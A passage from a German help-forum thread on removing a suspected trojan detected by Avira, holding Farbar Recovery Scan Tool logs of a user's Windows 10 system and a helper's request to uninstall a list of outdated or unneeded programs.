FirewallRules: [{CF682FC4-667B-412A-B731-549A2781BBA6}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{BBD5A84F-C65F-4F59-B161-BD2A52F65C3E}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{49B6683C-F54A-4540-BA92-94E0E2C847D9}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{27DE3267-189F-48B6-A95F-96853314326D}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{BF9F41BF-D6D8-4B81-8996-0740912FD647}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Skyrim\SkyrimLauncher.exe (Bethesda Softworks) [Datei ist nicht signiert]
FirewallRules: [{0D346682-FD29-43C0-8EDE-3D7C1D8855ED}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Skyrim\SkyrimLauncher.exe (Bethesda Softworks) [Datei ist nicht signiert]
FirewallRules: [{10CB5ED3-88E2-491D-B21A-3D946EDB4863}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Sims 3\Game\Bin\Sims3Launcher.exe (Electronic Arts -> Electronic Arts, Inc.)
FirewallRules: [{78A56F30-2B7C-46D3-964B-EB12E1157D66}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Sims 3\Game\Bin\Sims3Launcher.exe (Electronic Arts -> Electronic Arts, Inc.)
FirewallRules: [{39F8BBA7-4338-4C24-99C9-C4CC6317D96C}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{FC885D45-0677-4AFE-B7D3-7ACE2B16727E}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{13102939-BF52-4115-B690-543543567389}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Life Is Strange\Binaries\Win32\LifeIsStrange.exe => Keine Datei
FirewallRules: [{1A2F0519-AACA-4CC2-B35C-932C63FFB4F6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Life Is Strange\Binaries\Win32\LifeIsStrange.exe => Keine Datei
FirewallRules: [{9F661CBA-CF1B-46F0-9014-AB719F458652}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Blackwood Crossing\Blackwood Crossing.exe () [Datei ist nicht signiert]
FirewallRules: [{B95C53EC-CF8A-444A-9827-EB59D1084FA5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Blackwood Crossing\Blackwood Crossing.exe () [Datei ist nicht signiert]
FirewallRules: [{272856DB-6D2F-4A37-A817-A3F84B9DA474}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Client.exe => Keine Datei
FirewallRules: [{1C4F2FCA-6D64-403B-975F-D6E73FAFE751}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Client.exe => Keine Datei
FirewallRules: [{2FE5B42D-0732-49DA-8643-991FFB4FD15C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Client.exe => Keine Datei
FirewallRules: [{F6FF971C-55FD-4544-9308-57A30FC26301}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Client.exe => Keine Datei
FirewallRules: [{64D22DEE-D605-496F-A030-ECB4BC9C1539}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Server.exe => Keine Datei
FirewallRules: [{A7591A5E-F89C-46D2-9571-09C17B225263}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Server.exe => Keine Datei
FirewallRules: [{346C8694-BC30-48EE-A684-8EA1B45ADF83}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Server.exe => Keine Datei
FirewallRules: [{7DDDD07B-1436-49ED-BFC8-467972E1B579}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Server.exe => Keine Datei
FirewallRules: [{AA837FAF-50E2-43EC-A941-9933848A3974}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Server.NoConsole.exe => Keine Datei
FirewallRules: [{DD32840C-2770-4734-95AC-034711557422}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Server.NoConsole.exe => Keine Datei
FirewallRules: [{901461F8-1746-4337-A4ED-6B3DAC239756}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Server.NoConsole.exe => Keine Datei
FirewallRules: [{AF3D1A11-3C7E-4432-B597-1B026073A2E5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Server.NoConsole.exe => Keine Datei
FirewallRules: [{5A557F2F-F3F2-430E-B4DE-D022AC6A5E0B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.ServerWizard.exe => Keine Datei
FirewallRules: [{AE2409F5-D506-4B85-AC4B-AC6B6DC0CB17}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.ServerWizard.exe => Keine Datei
FirewallRules: [{2800AF44-11B3-457B-8947-6AE2DA9EDDF1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.ModManager.exe => Keine Datei
FirewallRules: [{7854E954-28BD-468B-858E-8ED359720FF0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.ModManager.exe => Keine Datei
FirewallRules: [{5A85C0F8-7541-4C5E-BEF6-88FEEBF8B916}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.SteamLauncher.exe => Keine Datei
FirewallRules: [{038B2FBE-08E5-4CF1-8288-03BF12FB686A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.SteamLauncher.exe => Keine Datei
FirewallRules: [{6A68D5AA-C920-4CC6-910A-9F7FB75C1123}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Zenimax Online\zosSteamStarter.exe (Zenimax Media Inc. -> Zenimax Online Studios)
FirewallRules: [{8F230B80-A823-482E-9D3B-29AD39378840}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Zenimax Online\zosSteamStarter.exe (Zenimax Media Inc. -> Zenimax Online Studios)
FirewallRules: [{3D2F6897-7F09-4E28-8054-5A1169B255D0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Life Is Strange\Binaries\Win32\LifeIsStrange.exe => Keine Datei
FirewallRules: [{D26B2ED2-399D-412B-BDE4-FEE079F10EB1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Life Is Strange\Binaries\Win32\LifeIsStrange.exe => Keine Datei
FirewallRules: [{777050EB-0A1C-4824-8921-5A549C4B4206}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Cities_Skylines\Cities.exe => Keine Datei
FirewallRules: [{1EEAAD22-5CB3-45EC-BAE5-0A5F745914EE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Cities_Skylines\Cities.exe => Keine Datei
FirewallRules: [{167C91D0-194A-44F4-B63A-D07DC4CF56D9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Morrowind\Morrowind Launcher.exe (Bethesda Softworks) [Datei ist nicht signiert]
FirewallRules: [{F13FEE40-55CE-4058-A07A-F33EAE1ACE64}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Morrowind\Morrowind Launcher.exe (Bethesda Softworks) [Datei ist nicht signiert]
FirewallRules: [{27FC6B3B-097C-4BC1-992A-EFDD6DC5C2DB}] => (Block) C:\Program Files (x86)\Avira\SoftwareUpdater\avirasoftwareupdatertoastnotificationsbridge.exe (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
FirewallRules: [{B30F4C33-ECA1-434C-98F4-997BD09954A4}] => (Allow) C:\Program Files (x86)\Avira\SoftwareUpdater\avirasoftwareupdatertoastnotificationsbridge.exe (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
FirewallRules: [{9A965A18-BE4E-488B-BDB2-E98400D0C5F8}] => (Allow) C:\Program Files (x86)\Avira\SoftwareUpdater\avirasoftwareupdatertoastnotificationsbridge.exe (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)

==================== Wiederherstellungspunkte =========================

23-09-2020 17:13:06 Geplanter Prüfpunkt
02-10-2020 10:46:57 Geplanter Prüfpunkt
03-10-2020 21:43:12 Removed 4K Video Downloader 4.8

==================== Fehlerhafte Geräte im Gerätemanager ============


==================== Fehlereinträge in der Ereignisanzeige: ========================

Applikationsfehler:
==================
Error: (10/03/2020 09:42:14 PM) (Source: SecurityCenter) (EventID: 17) (User: )
Description: Das Sicherheitscenter konnte den Aufrufer nicht überprüfen. Der Fehler %1 ist aufgetreten.

Error: (10/03/2020 09:28:22 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).

Error: (10/02/2020 09:44:24 AM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).

Error: (10/01/2020 01:23:23 PM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf (C:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (09/30/2020 06:39:43 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).

Error: (09/29/2020 10:22:34 AM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).

Error: (09/27/2020 07:31:54 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).

Error: (09/26/2020 02:54:53 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).


Systemfehler:
=============
Error: (10/02/2020 10:53:25 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Origin Web Helper Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
Der Dienst antwortete nicht rechtzeitig auf die Start- oder Steuerungsanforderung.

Error: (10/02/2020 10:53:25 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (60000 ms) wurde beim Verbindungsversuch mit dem Dienst Origin Web Helper Service erreicht.

Error: (10/02/2020 10:38:28 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Origin Web Helper Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
Der Dienst antwortete nicht rechtzeitig auf die Start- oder Steuerungsanforderung.

Error: (10/02/2020 10:38:28 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (60000 ms) wurde beim Verbindungsversuch mit dem Dienst Origin Web Helper Service erreicht.

Error: (10/02/2020 10:35:38 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT)
Description: Fehler "1115" in DCOM, als der Dienst "wuauserv" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{E60687F7-01A1-40AA-86AC-DB1CBF673334}

Error: (10/02/2020 10:35:38 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT)
Description: Fehler "1115" in DCOM, als der Dienst "wuauserv" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{E60687F7-01A1-40AA-86AC-DB1CBF673334}

Error: (09/26/2020 09:14:44 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-QQL9K51)
Description: Der Server "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (09/26/2020 09:14:44 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-QQL9K51)
Description: Der Server "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.


CodeIntegrity:
===================================

Date: 2020-10-01 12:02:54.9940000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\Avira\Antivirus\avirasecuritycenteragent.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2020-09-09 09:09:44.4130000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\Avira\Antivirus\avirasecuritycenteragent.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.

==================== Speicherinformationen =========================== 

BIOS: American Megatrends Inc. A.90 12/06/2017
Hauptplatine: Micro-Star International Co., Ltd. B350 PC MATE (MS-7A34)
Prozessor: AMD Ryzen 5 1600 Six-Core Processor 
Prozentuale Nutzung des RAM: 33%
Installierter physikalischer RAM: 16336.14 MB
Verfügbarer physikalischer RAM: 10904.49 MB
Summe virtueller Speicher: 18768.14 MB
Verfügbarer virtueller Speicher: 11099.3 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:930.91 GB) (Free:109.62 GB) NTFS

\\?\Volume{cf7b37e2-3cfb-4faf-8e5e-cb9cf918a024}\ (Wiederherstellung) (Fixed) (Total:0.49 GB) (Free:0.05 GB) NTFS
\\?\Volume{a61bd163-d7d8-42ba-b8e6-092c13901f01}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32

==================== MBR & Partitionstabelle ====================

==========================================================
Disk: 0 (Protective MBR) (Size: 931.5 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Ende von Addition.txt =======================
         

Alt 04.10.2020, 00:36   #2
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker - Standard

Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker



Erstmal muss da einiges an unnötigem oder veraltetem Krempel runter - das hier bitte über Programme und Features (appwiz.cpl) deinstallieren:


Adobe Acrobat Reader DC
Adobe Flash Player 32 NPAPI
Audacity 2.3.3
Avira
Avira Antivirus
Avira Phantom VPN
Avira Security
Avira Software Updater
Avira System Speedup
Java 8 Update 201
Web Companion
__________________

__________________

Alt 04.10.2020, 11:45   #3
Öhm
 
Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker - Standard

Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker



Danke für die Hilfe!
Die Programme wurden alle erfolgreich deinstalliert.
Hier die Addition:

Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 03-10-2020
durchgeführt von Tamy (04-10-2020 11:41:34)
Gestartet von C:\Users\Tamy\Desktop
Windows 10 Pro Version 2004 19041.508 (X64) (2020-08-18 06:57:41)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Admin (S-1-5-21-950702919-2450676760-769127011-1002 - Limited - Enabled)
Administrator (S-1-5-21-950702919-2450676760-769127011-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-950702919-2450676760-769127011-503 - Limited - Disabled)
Gast (S-1-5-21-950702919-2450676760-769127011-501 - Limited - Disabled)
Tamy (S-1-5-21-950702919-2450676760-769127011-1001 - Administrator - Enabled) => C:\Users\Tamy
WDAGUtilityAccount (S-1-5-21-950702919-2450676760-769127011-504 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avira Antivirus (Enabled - Up to date) {33CF8AA2-FA06-4AD4-98AB-332D53DD7FFB}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Amazon Kindle (HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\Amazon Kindle) (Version: 1.17.1.44183 - Amazon)
Avira (HKLM-x32\...\{47430B15-7CE6-46CF-903E-B85CD2D29A7D}) (Version: 1.2.151.3852 - Avira Operations GmbH & Co. KG) Hidden
Avira (HKLM-x32\...\{f24507a8-a438-4e46-9563-6d53c727bd7e}) (Version: 1.2.151.3852 - Avira Operations GmbH & Co. KG) Hidden
Blackmagic RAW Common Components (HKLM\...\{B5ABFF44-9702-4CA1-A7D8-DBA659709C49}) (Version: 1.7 - Blackmagic Design)
calibre 64bit (HKLM\...\{0185ADA8-A025-46A7-8A5C-7F5C2C000CC5}) (Version: 4.21.0 - Kovid Goyal)
DaVinci Resolve (HKLM\...\{74302397-BD1E-4917-B728-A1233CDEB39A}) (Version: 16.2.0055 - Blackmagic Design)
DaVinci Resolve Keyboards (HKLM\...\{04F776FB-37A2-4116-84F2-6CF3D731999D}) (Version: 1.0.0.0 - Blackmagic Design)
DaVinci Resolve Panels (HKLM\...\{567706B7-1501-43BC-81AB-C7E306B40C73}) (Version: 1.3.2.0 - Blackmagic Design)
Die Sims™ 4 (HKLM-x32\...\{48EBEBBF-B9F8-4520-A3CF-89A730721917}) (Version: 1.63.136.1010 - Electronic Arts Inc.)
doPDF 7.3 printer (HKLM\...\doPDF 7 printer_is1) (Version:  - Softland)
GUILD WARS (HKLM-x32\...\Guild Wars) (Version:  - )
Guild Wars 2 (HKLM\...\Guild Wars 2) (Version:  - NCsoft Corporation, Ltd.)
IrfanView 4.53 (64-bit) (HKLM\...\IrfanView64) (Version: 4.53 - Irfan Skiljan)
Logitech Gaming Software 9.00 (HKLM\...\Logitech Gaming Software) (Version: 9.00.42 - Logitech Inc.)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 85.0.564.68 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.135.29 - )
Microsoft Office 365 ProPlus - de-de (HKLM\...\O365ProPlusRetail - de-de) (Version: 16.0.12527.21104 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\OneDriveSetup.exe) (Version: 20.143.0716.0003 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.24.28127 (HKLM-x32\...\{282975d8-55fe-4991-bbbb-06a72581ce58}) (Version: 14.24.28127.4 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.24.28127 (HKLM-x32\...\{e31cb1a4-76b5-46a5-a084-3fa419e82201}) (Version: 14.24.28127.4 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Minecraft Launcher (HKLM-x32\...\{CFF44AE9-2908-4D7D-B48B-1CB5139015C7}) (Version: 1.0.0.0 - Mojang)
Mozilla Firefox 81.0.1 (x64 de) (HKLM\...\Mozilla Firefox 81.0.1 (x64 de)) (Version: 81.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 60.2.1 - Mozilla)
Mozilla Thunderbird 68.12.1 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 68.12.1 (x86 de)) (Version: 68.12.1 - Mozilla)
NVIDIA HD-Audiotreiber 1.3.38.16 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.38.16 - NVIDIA Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 23.2.1 - OBS Project)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.12527.20988 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.12527.20988 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.12527.20988 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0407-0000-0000000FF1CE}) (Version: 16.0.12527.20988 - Microsoft Corporation) Hidden
Origin (HKLM-x32\...\Origin) (Version: 10.5.73.41506 - Electronic Arts, Inc.)
PDF24 Creator 9.2.1 (HKLM-x32\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version: 9.2.1 - PDF24.org)
Pixum Fotowelt (HKLM-x32\...\Pixum Fotowelt) (Version: 6.4.7 - CEWE Stiftung u Co. KGaA)
Skype Version 8.62 (HKLM-x32\...\Skype_is1) (Version: 8.62 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Sweet Home 3D version 6.3 (HKLM\...\Sweet Home 3D_is1) (Version: 6.3 - eTeks)
Teams Machine-Wide Installer (HKLM-x32\...\{39AF0813-FA7B-4860-ADBE-93B9B214B914}) (Version: 1.2.0.34161 - Microsoft Corporation)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.3.2 - TeamSpeak Systems GmbH)
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.2.2756 - TeamViewer)
The Elder Scrolls Online (HKLM-x32\...\The Elder Scrolls Online) (Version: 2.6.3.0 - Zenimax Online Studios)
Twitch (HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 8.0.0 - Twitch Interactive, Inc.)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{16AD6161-2E47-4BF1-AA77-0946EFE93E08}) (Version: 2.61.0.0 - Microsoft Corporation)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.11 - VideoLAN)
YuLinc AppShare Screen Sharing (HKLM-x32\...\{c24e795a-89f0-4ca3-a185-24a140e22413}) (Version: 5.1.4.22070 - netucate systems GmbH)

Packages:
=========
Media Engine-Add-On für Fotos -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2019-10-26] (Microsoft Corporation)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-05] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-05] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.8101.0_x64__8wekyb3d8bbwe [2020-08-20] (Microsoft Studios) [MS Ad]

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2019-10-03] (NVIDIA Corporation -> NVIDIA Corporation)

==================== Codecs (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Drivers32: [vidc.VP60] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2014-09-16] (Electronic Arts -> On2.com)
HKLM\...\Drivers32: [vidc.VP61] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2014-09-16] (Electronic Arts -> On2.com)

==================== Verknüpfungen & WMI ========================

==================== Geladene Module (Nicht auf der Ausnahmeliste) =============

2020-10-04 11:37 - 2020-10-04 11:37 - 000228352 _____ () [Datei ist nicht signiert] C:\Program Files\Mozilla Firefox\zlib1.dll
2017-10-13 12:43 - 2017-10-13 12:43 - 004048896 _____ (Digia Plc and/or its subsidiary(-ies)) [Datei ist nicht signiert] C:\Program Files (x86)\netucate\YuLinc AppShare\Qt5Core.dll
2017-10-13 12:43 - 2017-10-13 12:43 - 000816640 _____ (Digia Plc and/or its subsidiary(-ies)) [Datei ist nicht signiert] C:\Program Files (x86)\netucate\YuLinc AppShare\Qt5Network.dll
2020-09-16 11:44 - 2020-09-16 11:44 - 000913920 _____ (ServiceStack) [Datei ist nicht signiert] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\ServiceStack.Text\6e8040da5ae4ebd7181660c1b791507c\ServiceStack.Text.ni.dll
2017-10-13 12:43 - 2017-10-13 12:43 - 022317056 _____ (The ICU Project) [Datei ist nicht signiert] C:\Program Files (x86)\netucate\YuLinc AppShare\icudt51.dll
2017-10-13 12:43 - 2017-10-13 12:43 - 001767424 _____ (The ICU Project) [Datei ist nicht signiert] C:\Program Files (x86)\netucate\YuLinc AppShare\icuin51.dll
2017-10-13 12:43 - 2017-10-13 12:43 - 001295872 _____ (The ICU Project) [Datei ist nicht signiert] C:\Program Files (x86)\netucate\YuLinc AppShare\icuuc51.dll
2019-01-20 16:26 - 2020-03-16 15:05 - 001282048 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\LIBEAY32.dll
2019-01-20 16:26 - 2020-03-16 15:06 - 000279040 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\ssleay32.dll
2019-01-20 16:26 - 2019-07-12 09:23 - 001611264 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\platforms\qwindows.dll
2020-06-25 14:18 - 2019-07-12 09:23 - 005487104 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Core.dll
2020-06-25 14:18 - 2019-07-12 09:23 - 005841920 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Gui.dll
2020-06-25 14:18 - 2019-07-12 09:23 - 001179136 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Network.dll
2020-06-25 14:18 - 2019-07-12 09:23 - 000146432 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5WebSockets.dll
2020-06-25 14:18 - 2019-07-12 09:23 - 005089792 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Widgets.dll
2020-06-25 14:18 - 2019-07-12 09:23 - 000184832 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Xml.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================

==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========

SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
